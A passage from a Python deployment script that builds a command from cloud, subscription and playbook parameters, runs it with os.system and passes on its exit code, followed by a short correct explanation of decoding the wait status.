                    private_subnet_id2,
                    private_subnet_id3,
                    public_subnet_id1,
                    public_subnet_id2,
                    public_subnet_id3,
                    byo_bastion,
                    bastion_sg,
                    master_instance_type,
                    node_instance_type,
                    app_instance_type,
                    bastion_instance_type,
                    public_hosted_zone,
                    wildcard_zone,
                    console_port,
                    deployment_type,
                    rhsm_user,
                    rhsm_password,
                    rhsm_pool,
                    containerized,
                    s3_bucket_name,
                    s3_username,
                    playbook)

    if verbose > 0:
      command += " -" + "".join(['v']*verbose)
      click.echo('We are running: %s' % command)

    status = os.system(command)
    if os.WIFEXITED(status) and os.WEXITSTATUS(status) != 0:
      sys.exit(os.WEXITSTATUS(status))
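The closing lines decode the wait status returned by os.system: os.WIFEXITED and os.WEXITSTATUS (POSIX-only) extract the child's exit code, which is then propagated to the script's own caller through sys.exit. A minimal sketch of the same pattern (run_or_die is an illustrative name):

import os
import sys

def run_or_die(command):
    # os.system returns an encoded wait status, not the exit code itself;
    # decode it and propagate any failure to our own caller via sys.exit
    status = os.system(command)
    if os.WIFEXITED(status) and os.WEXITSTATUS(status) != 0:
        sys.exit(os.WEXITSTATUS(status))

run_or_die('true')   # child exits 0: execution continues
run_or_die('false')  # child exits 1: the script exits with code 1

On Python 3.9+, os.waitstatus_to_exitcode(status) performs the same decoding in one call, and subprocess.run(command, shell=True).returncode avoids wait statuses entirely.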